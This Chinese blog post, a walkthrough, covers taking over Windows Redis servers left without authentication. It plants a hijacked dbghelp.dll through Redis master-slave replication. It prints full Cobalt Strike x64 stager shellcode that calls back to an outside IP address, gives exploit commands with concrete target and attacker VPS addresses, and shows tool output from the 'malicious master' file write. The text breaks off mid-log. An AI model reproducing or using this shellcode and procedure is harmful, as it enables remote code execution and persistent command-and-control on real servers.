
  <!DOCTYPE html>
  <html lang="zh-CN"  >
  <head>
  <meta charset="utf-8">
  

  

  

  <script>window.REIMU_CONFIG = {};window.REIMU_CONFIG.icon_font = '4552607_bq08450reo';window.REIMU_CONFIG.clipboard_tips = {"success":"复制成功(*^▽^*)","fail":"复制失败 (ﾟ⊿ﾟ)ﾂ","copyright":{"enable":false,"count":50,"content":"本文版权：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！"}};window.REIMU_CONFIG.code_block = {"expand":true};</script>
  
  <title>
    Windows环境Redis未授权访问漏洞利用 |
    
    KL
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
  
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_bq08450reo.woff2" as="font" type="font/woff2" crossorigin="anonymous">
  
  
    
<link rel="stylesheet" href="/css/loader.css">

  
  
    <meta name="description" content="总：Redis在Windows环境下Getshell方法小结-腾讯云开发者社区-腾讯云 这里暂且先提一下DLL劫持上线CS  Windows环境Redis DLL劫持上线CS  利用原理 参考文章： Windows中redis未授权通过dll劫持上线 - 我要变超人 - 博客园 Windows Redis DLL劫持在实战中的利用-先知社区  DLL劫持原理 DLL：Windows的动态链接库，简">
<meta property="og:type" content="article">
<meta property="og:title" content="Windows环境Redis未授权访问漏洞利用">
<meta property="og:url" content="https://fub0y2026.github.io/2026/01/15/Windows%E7%8E%AF%E5%A2%83Redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/index.html">
<meta property="og:site_name" content="KL">
<meta property="og:description" content="总：Redis在Windows环境下Getshell方法小结-腾讯云开发者社区-腾讯云 这里暂且先提一下DLL劫持上线CS  Windows环境Redis DLL劫持上线CS  利用原理 参考文章： Windows中redis未授权通过dll劫持上线 - 我要变超人 - 博客园 Windows Redis DLL劫持在实战中的利用-先知社区  DLL劫持原理 DLL：Windows的动态链接库，简">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://fub0y2026.github.io/images/image-20260115005750973.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/image-20260115010011449.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/image-20260115010214874.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/image-20260115010313680.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/image-20260115011844863.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/image-20260115013502377.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/image-20260115013540109.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/image-20260115013614283.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/image-20260115014205538.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/image-20260115014330646.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/image-20260115123202073.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/image-20260115124231676.png">
<meta property="og:image" content="https://fub0y2026.github.io/images/image-20260115124535830.png">
<meta property="article:published_time" content="2026-01-15T04:55:27.000Z">
<meta property="article:modified_time" content="2026-01-15T04:59:47.278Z">
<meta property="article:author" content="FuB0Y">
<meta property="article:tag" content="Redis未授权访问">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://fub0y2026.github.io/images/image-20260115005750973.png">
  
  
    <link rel="alternate" href="/atom.xml" title="KL" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/images/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
  
    
      
        
<link rel="stylesheet" href="https://npm.webcache.cn/katex@0.16.11/dist/katex.min.css">

      
    
  
  
  
  
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js" integrity="sha384-k6YtvFUEIuEFBdrLKJ3YAUbBki333tj1CSUisai5Cswsg9wcLNaPzsTHDswp4Az8" crossorigin="anonymous"></script>

  
  
    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.1.0/dist/aos.css">

  
  
<meta name="generator" content="Hexo 7.3.0"></head>

  <body>
    
  <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi">
        
          <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
            <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="var(--red-1, #ff5252)" />
            <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
           M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="var(--red-1, #ff5252)" />
          </svg>
        
      </div>
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var startLoading = () => {
      time = Date.now();
      document.getElementById('loader').classList.remove("loading");
    }
    var endLoading = () => {
      if (!time) {
        document.body.style.overflow = 'auto';
        document.getElementById('loader').classList.add("loading");
      } else {
        if (Date.now() - time > 500) {
          time = null;
          document.body.style.overflow = 'auto';
          document.getElementById('loader').classList.add("loading");
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    document.getElementById('loader').addEventListener('click', endLoading);
  </script>

<div id="copy-tooltip" style="pointer-events: none; opacity: 0; transition: all 0.2s ease; position: fixed;top: 50%;left: 50%;z-index: 999;transform: translate(-50%, -50%);color: white;background: rgba(0, 0, 0, 0.5);padding: 10px 15px;border-radius: 10px;">
</div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav">
    
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/">首页</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/archives">归档</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/about">关于</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/friend">友链</a>
        </span>
      
    
    <a id="main-nav-toggle" class="nav-icon"></a>
  </nav>
  <nav id="sub-nav">
    
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS 订阅" target="_blank"></a>
    
    
    
  </nav>
</div>
<header id="header">
  
    <picture>
      
    </picture>
    
      <img fetchpriority="high" src="/images/banner.webp" alt="Windows环境Redis未授权访问漏洞利用">
    
  
  <div id="header-outer">
    <div id="header-title">
      
        
        
          <a href="/" id="logo">
            <h1 data-aos="slide-up">Windows环境Redis未授权访问漏洞利用</h1>
          </a>
        
      
      
        
        <h2 id="subtitle-wrap" data-aos="slide-down">
          
        </h2>
      
    </div>
  </div>
</header>

        <div id="content"  class="sidebar-right" >
          <aside id="sidebar">
  
  
  <div class="sidebar-wrapper wrap-sticky">
    <div class="sidebar-wrap" data-aos="fade-up">
      
        <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#windows%E7%8E%AF%E5%A2%83redis-dll%E5%8A%AB%E6%8C%81%E4%B8%8A%E7%BA%BFcs"><span class="toc-number">1.</span> <span class="toc-text"> Windows环境Redis DLL劫持上线CS</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E5%8E%9F%E7%90%86"><span class="toc-number">1.1.</span> <span class="toc-text"> 利用原理</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#dll%E5%8A%AB%E6%8C%81%E5%8E%9F%E7%90%86"><span class="toc-number">1.1.1.</span> <span class="toc-text"> DLL劫持原理</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8A%AB%E6%8C%81dbghelpdll"><span class="toc-number">1.1.2.</span> <span class="toc-text"> 劫持dbghelp.dll</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%87%BD%E6%95%B0%E8%BD%AC%E5%8F%91%E5%8A%AB%E6%8C%81"><span class="toc-number">1.1.3.</span> <span class="toc-text"> 函数转发劫持</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB"><span class="toc-number">1.2.</span> <span class="toc-text"> 攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%8D%E5%87%BA%E7%BD%91%E6%83%85%E5%86%B5"><span class="toc-number">1.3.</span> <span class="toc-text"> 不出网情况</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.jpg" data-sizes="auto" alt="FuB0Y" class="lazyload">
  <div class="sidebar-author-name">FuB0Y</div>
  <div class="sidebar-description">世所谓英雄者，不以挫抑而灰心，不以失败而退怯</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">382</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">13</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">323</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
    
  
</div>
</div>
      
      
        <div class="sidebar-btn-wrapper" style="position:static">
          <div class="sidebar-toc-btn current"></div>
          <div class="sidebar-common-btn"></div>
        </div>
      
    </div>
  </div>

  <div class="sidebar-widget">
  
  </div>
</aside>

          <section id="main"><article id="post-Windows环境Redis未授权访问漏洞利用" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <a href="/2026/01/15/Windows%E7%8E%AF%E5%A2%83Redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/" class="article-date-link" data-aos="zoom-in">
    <time datetime="2026-01-15T04:55:27.000Z" itemprop="datePublished">2026-01-15</time>
    <time style="display: none;" id="post-update-time">2026-01-15</time>
  </a>
</div>

      
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E7%9F%A5%E8%AF%86%E7%82%B9/" data-aos="zoom-in">知识点</a>
  </div>


    </div>
    <div class="hr-line"></div>
    

    <div class="e-content article-entry" itemprop="articleBody">
      
      
        <p>总：<a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1488184">Redis在Windows环境下Getshell方法小结-腾讯云开发者社区-腾讯云</a></p>
<p>这里暂且先提一下DLL劫持上线CS</p>
<h2 id="windows环境redis-dll劫持上线cs"><a class="markdownIt-Anchor" href="#windows环境redis-dll劫持上线cs"></a> Windows环境Redis DLL劫持上线CS</h2>
<h3 id="利用原理"><a class="markdownIt-Anchor" href="#利用原理"></a> 利用原理</h3>
<p>参考文章： <a target="_blank" rel="noopener" href="https://www.cnblogs.com/sup3rman/p/16803408.html">Windows中redis未授权通过dll劫持上线 - 我要变超人 - 博客园</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/13892">Windows Redis DLL劫持在实战中的利用-先知社区</a></p>
<h4 id="dll劫持原理"><a class="markdownIt-Anchor" href="#dll劫持原理"></a> DLL劫持原理</h4>
<p>DLL：Windows的动态链接库，简单来说，就是一部分Windows平台下的通用代码并没有写在程序里，而是当程序需要使用时去DLL里调用。<br />
DLL劫持：当程序没有指定DLL的绝对路径时，就会按一定顺序查找DLL，从而攻击者有机会在优先级更高的目录里放置恶意DLL。<br />
标准的DLL查找顺序：</p>
<blockquote>
<ol>
<li><strong>应用程序目录</strong>：首先，系统会在启动应用程序的目录中查找指定的 DLL 文件。</li>
<li><strong>系统目录</strong>：接下来，系统会在 Windows 系统目录中查找 DLL。系统目录通常是 <code>C:\Windows\System32</code>。</li>
<li><strong>16 位系统目录</strong>：然后，系统会在 16 位系统目录中查找，通常是 <code>C:\Windows\SysWOW64</code>。这一步主要是为了兼容性，用于在 64 位系统上运行 32 位应用程序。</li>
<li><strong>Windows 目录</strong>：接着是 Windows 的根目录，通常是 <code>C:\Windows</code>。</li>
<li><strong>当前工作目录</strong>：此后，系统会在当前工作目录中查找 DLL。这个目录是当前活动的目录，可能随着应用程序的运行而变化。</li>
<li><strong>系统环境变量指定的路径</strong>：最后，系统会按照在环境变量 <code>PATH</code> 中指定的顺序搜索 DLL。</li>
</ol>
</blockquote>
<p>举例：</p>
<blockquote>
<p>例如，假设有一个应用程序叫做<code>&quot;example.exe</code>&quot;，它依赖于名为&quot;<code>example.dll</code>&quot;的动态链接库。而&quot;example.exe&quot;在加载&quot;example.dll&quot;时没有使用绝对路径，而是仅仅指定了DLL的名称。攻击者可以将恶意的&quot;example.dll&quot;文件放置在与&quot;example.exe&quot;相同的目录下，当&quot;example.exe&quot;启动时，系统会先在当前目录中查找&quot;example.dll&quot;文件，如果找到，就会加载该文件并执行其中的恶意代码。</p>
</blockquote>
<p>DLL劫持可以函数转发劫持也可以往完整DLL插入恶意代码，这里用的函数转发劫持，大致流程如下图所示：</p>
<p><img src="/images/image-20260115005750973.png" alt="image-20260115005750973" /></p>
<h4 id="劫持dbghelpdll"><a class="markdownIt-Anchor" href="#劫持dbghelpdll"></a> 劫持dbghelp.dll</h4>
<p>redis-server.exe在执行bgsave时，会先在应用目录查找dbghelp.dll，找不到再去system32目录下找：</p>
<p><img src="/images/image-20260115010011449.png" alt="image-20260115010011449" /></p>
<p>而不管redis的权限是Administrator还是普通用户或者Network Service，它对自己的应用目录一定有写文件的权限，我们可以通过Redis的主从复制在应用目录里写入恶意DLL。</p>
<h4 id="函数转发劫持"><a class="markdownIt-Anchor" href="#函数转发劫持"></a> 函数转发劫持</h4>
<p>对DLL进行函数转发劫持需要导出原本DLL的函数和地址，以保证程序通过恶意DLL调用这些函数时不影响正常功能，DLL的导出函数一般</p>
<p>比较多，用Aheadlib之类的工具可以自动化处理。</p>
<p>这里用的是DLLHijacker：<a target="_blank" rel="noopener" href="https://github.com/kiwings/DLLHijacker">https://github.com/kiwings/DLLHijacker</a></p>
<p>它会自动处理导出表并生成一个VS2019的项目，但这个python脚本有几个bug：</p>
<p>（1）VS项目中文乱码：</p>
<p>修复：几个写文件的地方添加<code>encoding=&quot;utf-8&quot;</code>。</p>
<p>（2）函数导出表有匿名函数的时候，会导致<code>[-]Error occur: 'NoneType' object has no attribute 'decode'</code>：</p>
<p>修复：在几个for循环里添加函数名是否为空的判断可以解决这个问题。</p>
<p>（3）生成C/C++代码时，没有使用目标DLL的绝对路径，只是用了DLL的名字填充<code>LoadLibrary()</code>，这是一个很严重的bug，会导致函数</p>
<p>转发失败、Redis的功能受到影响从而只能劫持一次：</p>
<p>修复：我改成了根据输入的目标DLL路径自动填充。</p>
<p><img src="/images/image-20260115010214874.png" alt="image-20260115010214874" /></p>
<p>正常的DLL转发劫持如下，调用完应用程序目录里的恶意DLL后会调用原DLL：</p>
<p><img src="/images/image-20260115010313680.png" alt="image-20260115010313680" /></p>
<h3 id="攻击"><a class="markdownIt-Anchor" href="#攻击"></a> 攻击</h3>
<p>从本地的<strong>system32</strong>文件夹下提取出 <code>dbghelp.dll</code>，然后使用 <a target="_blank" rel="noopener" href="https://github.com/JKme/sb_kiddie-/blob/master/hacking_win/dll_hijack/DLLHijacker.py">dllHijack</a> 脚本，</p>
<p>用脚本生成<strong>dbghelp.dll</strong> 的Visual Studio 2019的项目文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 DllHijacker.py dbghelp.dll </span><br></pre></td></tr></table></figure>
<blockquote>
<p>如是是Windows 64位的Redis DLL劫持的话，可以直接用里面的VS2022版的dbghelp项目</p>
<p><img src="/images/image-20260115011844863.png" alt="image-20260115011844863" /></p>
</blockquote>
<p><img src="/images/image-20260115013502377.png" alt="image-20260115013502377" /></p>
<p>生成</p>
<p><img src="/images/image-20260115013540109.png" alt="image-20260115013540109" /></p>
<p>打开生成目录里的sln文件，因为原本是VS2019的项目所以会提醒你升级，选确定，不然得另外安装v142的编译组件才能编译VS2019的项目：</p>
<p><img src="/images/image-20260115013614283.png" alt="image-20260115013614283" /></p>
<p>然后选中项目设置属性：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">***********************重点***********************</span><br><span class="line">请在VS2019中修改项目的属性如果不改，那么靶机无法加载生成出来的DLL</span><br><span class="line">属性-&gt;C/C++-&gt;代码生成-&gt;运行库-&gt;多线程 (/MT)如果是debug则设置成MTD  </span><br><span class="line">属性-&gt;C/C++-&gt;代码生成-&gt;禁用安全检查GS</span><br><span class="line">关闭生成清单 属性-&gt;链接器-&gt;清单文件-&gt;生成清单 选择否</span><br></pre></td></tr></table></figure>
<p><img src="/images/image-20260115014205538.png" alt="image-20260115014205538" /></p>
<p><img src="/images/image-20260115014330646.png" alt="image-20260115014330646" /></p>
<p>然后用VPS启动CS，生成一个payload</p>
<p><img src="/images/image-20260115123202073.png" alt="image-20260115123202073" /></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* length: 891 bytes */</span></span><br><span class="line"><span class="type">unsigned</span> <span class="type">char</span> buf[] = <span class="string">&quot;\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\xb8\x22\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x4a\x7a\x49\x50\x00\x31\xaa\xc3\xa0\xa2\xf8\x2e\x8e\xdc\xef\x40\x82\xc4\x05\xe7\x7c\x13\x6b\xde\xd7\xd5\x1b\x90\x13\xb4\x1b\x90\x58\x3b\x2d\x9d\x2a\x08\x03\xbc\x35\xbd\xf4\x9c\x6e\xeb\xa2\x94\x4b\xc1\xfb\x24\x7c\x14\x5d\xf4\x51\x78\xce\xe2\x19\x64\xbe\x08\xc2\x85\x82\x6e\xd2\xde\x8a\xe9\xa3\xc0\x0a\x4a\xa0\xe5\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x42\x4f\x49\x45\x39\x3b\x45\x4e\x49\x4e\x29\x0d\x0a\x00\x24\x3b\x1d\x42\x86\x09\x09\x8f\x21\xd5\x63\xfa\x17\x24\xd5\x32\x6b\xdb\x6e\x64\xe7\x1d\x37\x4d\x87\xa4\x28\x9c\x42\x29\x68\x16\x3e\x47\x4f\x27\xa4\x0b\x26\xfe\xf6\x8a\x5e\x56\xd8\xd0\x92\x56\xf6\x5d\x31\xe5\xd1\x6e\x7d\x41\x7e\xab\xa8\xfc\x82\x20\xad\x3e\x68\x23\xea\x12\x5d\x03\x65\x3f\xc1\xb3\x38\x0b\xa8\x8f\x12\x03\x44\x1e\x9a\x36\xa3\xc0\x47\x33\x08\x8d\xb8\x82\x8e\x86\x37\xba\x4d\x1c\xd1\x53\x10\x0f\xe2\x99\x3a\xd7\xee\xe0\x82\xc8\xfd\xda\xaf\x67\x34\x91\x7f\xb0\xc9\x6e\xe3\xe2\xb5\x65\x85\xdc\x67\x86\xab\x0a\xa4\xfd\x4b\xbe\x73\x1c\xde\x2b\x1a\x2c\x6a\x6e\xed\x7f\xd0\xde\x60\x08\x8b\x92\xde\xb8\xec\xdf\x6d\xac\xdd\x85\xf2\x42\x1b\xe1\xf3\x3a\xac\xaf\x0d\xdd\x3c\xab\x5b\x65\x34\x4e\x45\x63\x80\x29\x90\x1c\x9d\x53\x18\xa5\x5b\x15\x97\x6c\x37\x82\x6a\x7b\x71\xbd\x85\xfb\x7a\x7a\x84\xb0\x43\x65\xed\xf4\xed\x06\xf0\xe3\x25\x16\x1f\x52\xb9\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x38\x2e\x31\x34\x38\x2e\x32\x31\x31\x2e\x34\x37\x00\x17\x50\x65\xea&quot;</span>;</span><br></pre></td></tr></table></figure>
<p>在源文件的dllmain.app里把payload替换进去，然后选Release x64，生成——生成解决方案：</p>
<p><img src="/images/image-20260115124231676.png" alt="image-20260115124231676" /></p>
<p>然后这里有几种方法：<br />
<strong>1、直接主从复制漏洞把文件写进去：</strong><br />
<img src="/images/image-20260115124535830.png" alt="image-20260115124535830" /></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 redis-attack.py -r 39.99.225.243 -L 116.62.50.188 -wf dbghelp.dll</span><br></pre></td></tr></table></figure>
<p>然后再连接并bgsave</p>
<p><strong>2、用RedisWriteFile脚本写进去（利用的也是主从复制漏洞）</strong></p>
<p>把生成好的文件上传到 <code>RedisWriteFile.py</code> 同级目录下面<br />
然后把脚本 <code>RedisWriteFile</code> 文件夹上传到你的VPS上</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 RedisWriteFile.py --rhost 【靶机IP】 --rport 6379 --lhost 8.148.211.47 --lport 16379 --rpath &#x27;C:\\Program Files\\Redis\\&#x27; --rfile &#x27;dbghelp.dll&#x27; --lfile &#x27;dbghelp.dll&#x27;</span><br></pre></td></tr></table></figure>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#上传DLL到靶机</span></span><br><span class="line">root@hcss-ecs-0abd:/home/Redis_Server/RedisWriteFile-master<span class="comment"># python3 RedisWriteFile.py --rhost 【靶机IP】 --rport 6379 --lhost 【你的VPS地址】  --lport 16379 --rpath &#x27;C:\\Program Files\\Redis\\&#x27; --rfile &#x27;dbghelp.dll&#x27; --lfile &#x27;dbghelp.dll&#x27;</span></span><br><span class="line"></span><br><span class="line">______         _ _     _    _      _ _      ______ _ _      </span><br><span class="line">| ___ \       | (_)   | |  | |    (_) |     |  ___(_) |     </span><br><span class="line">| |_/ /___  __| |_ ___| |  | |_ __ _| |_ ___| |_   _| | ___ </span><br><span class="line">|    // _ \/ _ | / __| |/\| | &#x27;&#x27;__| | __/ _ \  _| | | |/ _ \</span><br><span class="line">| |\ \  __/ (_| | \__ \  /\  / |  | | ||  __/ |   | | |  __/</span><br><span class="line">\_| \_\___|\__,_|_|___/\/  \/|_|  |_|\__\___\_|   |_|_|\___|     </span><br><span class="line"></span><br><span class="line">                    Author : R3start   </span><br><span class="line">          Reference : redis-rogue-server.py</span><br><span class="line"></span><br><span class="line"><span class="section">[info]</span> TARGET 39.98.110.252:6379</span><br><span class="line"><span class="section">[info]</span> SERVER 124.71.111.64:16379</span><br><span class="line"><span class="section">[info]</span> 连接恶意主服务器: 124.71.111.64:16379 </span><br><span class="line"><span class="section">[info]</span> 连接恶意主状态: +OK</span><br><span class="line"> </span><br><span class="line"><span class="section">[info]</span> 设置写出路径为: C:\\Program Files\\Redis\\ </span><br><span class="line"><span class="section">[info]</span> 设置写出路径状态: +OK</span><br><span class="line"> </span><br><span class="line"><span class="section">[info]</span> 设置写出文件为: dbghelp.dll</span><br><span class="line"><span class="section">[info]</span> 设置写出文件状态: +OK</span><br><span class="line"> </span><br><span class="line"><span class="section">[info]</span> 断开主从连接: +OK</span><br><span class="line"></span><br><span class="line"><span class="section">[info]</span> 